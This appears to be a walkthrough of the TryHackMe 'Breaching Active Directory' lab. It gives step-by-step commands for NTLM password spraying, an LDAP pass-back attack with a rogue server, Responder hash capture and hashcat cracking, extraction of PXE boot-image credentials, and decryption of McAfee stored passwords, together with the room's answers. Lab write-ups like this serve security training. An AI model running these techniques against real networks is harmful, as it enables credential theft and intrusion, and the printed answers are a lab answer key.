Skip to content

Breaching Active Directory Banner

Breaching Active Directory Logo

Breaching Active Directory

This guide contains the answer and steps necessary to get to them for the Breaching Active Directory room.

Table of contents

OSINT and Phishing

  1. I understand OSINT and how it can be used to breach AD

  2. I understand Phishing and how it can be used to breach AD

  3. What popular website can be used to verify if your email address or password has ever been exposed in a publicly disclosed data breach?

This answer can be found in the text or by searching online.

Click for answerHaveIBeenPwned

NTLM Authenticated Services

  1. What is the name of the challenge-response authentication mechanism that uses NTLM?

This can be found in the text.

Click for answerNetNtlm

  1. What is the username of the third valid credential pair found by the password spraying script?

We first download the pyton script and place it on our machine. Herein we can see we have four arguments we need to supply (-u, -f, -p, -a).

NTLM Script.png

Using Changeme123 as the password, we use the following command to start the spray attack:

python3 ntlm_passwordspray.py -u usernames.txt -f za.tryhackme.com -p Changeme123 -a http://ntlmauth.za.tryhackme.com/

NTLM Credentials.png

We found four sets of credentials using this attack!

Click for answergordon.stevens

  1. How many valid credentials pairs were found by the password spraying script?

This is found from the results of the scan in the previous question.

Click for answer4

  1. What is the message displayed by the web application when authenticating with a valid credential pair?

On http://ntlmauth.za.tryhackme.com/ we get a login screen where we can use our previously found credentials.

NTLM Login.png

Logging in on Firefox didn't work, so I had to switch to Chrome.

NTLM Welcome.png

Click for answerHello World

LDAP Bind Credentials

  1. What type of attack can be performed against LDAP Authentication systems not commonly found against Windows Authentication systems?

The answer can be found in the text.

Click for answerLDAP Pass-back Attack

  1. What two authentication mechanisms do we allow on our rogue LDAP server to downgrade the authentication and make it clear text?

The answer can be found in the text.

Click for answerLOGIN,PLAIN

  1. What is the password associated with the svcLDAP account?

Since I didn't have OpenLPAD installed on my machine I had to do so manually with:

sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapd

sudo dpkg-reconfigure -p low slapd

On the config screen we start the server config process.

LDAP Config 1.png

We use za.tryhackme.com as the domain and the company name.

LDAP Config 2.png

Next, we create a file called `` with the following contents:

#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

We then update the LDAP server with:

sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart

LDAP Config 3.png

Using `` we can see if the configuration has been completed successfully.

LDAP Config 4.png

After testing the connection again on the printer page, we get the error message telling us we succeeded.

LDAP Syntax.png

Now we can monitor the network traffic to intercept the password.

Using Wireshark we use the breachad interface to collect the correct data. We can clear up the screen by only looking at the data coming from the printer.

ip.src == 10.200.24.201 and ldap

After a few tries, we get the credentials in one of the calls in cleartext.

LDAP Credentials.png

Click for answertryhackmeldappass1@

Authentication Relays

  1. What is the name of the tool we can use to poison and capture authentication requests on the network?

The answer can be found in the text.

Click for answerResponder

  1. What is the username associated with the challenge that was captured?

First, we setup Responder to listen for authentication requests.

sudo responder -I breachad

Auth Responder.png

After a while, we see it has intercepted a request. This request contains the name and password hash of the user.

Auth Event.png

With this hash and the provided password list, we can attempt to crack the hash using hascat. Hashtype 5600 is for NTLMv2-SSP.

hashcat -a 0 -m 5600 ntlmhash passwordlist-1647876320267.txt --force

Auth Cracked.png

Click for answersvcFileCopy

  1. What is the value of the cracked password associated with the challenge that was captured?

Click for answerFPassword1!

Microsoft Deployment Toolkit

  1. What Microsoft tool is used to create and host PXE Boot images in organisations?

The answer can be found in the text.

Click for answer

  1. What network protocol is used for recovery of files from the MDT server?

The answer can be found in the text.

Click for answer

  1. What is the username associated with the account that was stored in the PXE Boot image?

I couldn't get the ssh connection to work on my kali instance, so I tried through the attackbox. After connecting, I created a new folder and added the powerpxe binary to it.

cd Documents
mkdir Kevinovitz
copy C:\powerpxe Kevinovitz\C:\powerpxe\LICENSE
cd Kevinovitz

Mdt Ssh.png

I then looked up the IP for the MDT server with nslookup:

nslookup thmmdt.za.tryhackme.com

Mdt Ip.png

Now we can transfer the bcd file using tftp, using the file name we found on the MDT server.

Mdt Files.png

tftp -i 10.200.24.202 GET "\tmp\x64uefi{D2CDF2F6-30D2-430D-84C0-32C200D1D39A}.bcd" conf.bcd

Mdt Tftp.png

Here we get the path to the pxe boot file. We can download it with tftp using this path.

tftp -i 10.200.24.202 GET "\Boot\x64\Images\LiteTouchPE_x64.wim" pxeboot.wim

Mdt Pxe.png

Now we can attempt to exfiltrate the credentials.

Get-FindCredentials -WimFile pxeboot.wim

Mdt Credentials.png

Click for answersvcMDT

  1. What is the password associated with the account that was stored in the PXE Boot image?

This password was found in the previous task using PowerPXE.

Click for answerPXEBootSecure1@

  1. While you should make sure to cleanup you user directory that you created at the start of the task, if you try you will notice that you get an access denied error. Don't worry, a script will help with the cleanup process but remember when you are doing assessments to always perform cleanup.

Configuration Files

  1. What type of files often contain stored credentials on hosts?

The answer can be found in the text.

Click for answerConfiguration Files

  1. What is the name of the McAfee database that stores configuration including credentials used to connect to the orchestrator?

The answer can be found in the text.

Click for answerma.db

  1. What table in this database stores the credentials of the orchestrator?

The answer can be found in the text.

Click for answerAGENT_REPOSITORIES

  1. What is the username of the AD account associated with the McAfee service?

First we look up where the ma.db file is located. Namely: cd C:\ProgramData\McAfee\Agent\DB.

Configuration File.png

We then transfer this file to our machine.

scp thm@thmjmp1.za.tryhackme.com:C:/ProgramData/McAfee/Agent/DB/ma.db .

Configuration Transfer.png

Opening this database in sqlitebrowser, we can open the table containing the credentials.

sqlitebrowser ma.db

Here we navigate to the AGENT_REPOSITORIES table and find the credentials we are looking for.

Configuration Credentials.png

Click for answersvcAV

  1. What is the password of the AD account associated with the McAfee service?

Using the decryption script, we can decrypt the password we got from the database.

python2 mcafee_sitelist_pwd_decrypt.py jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==

Configuration Password.png

Click for answerMyStrongPassword!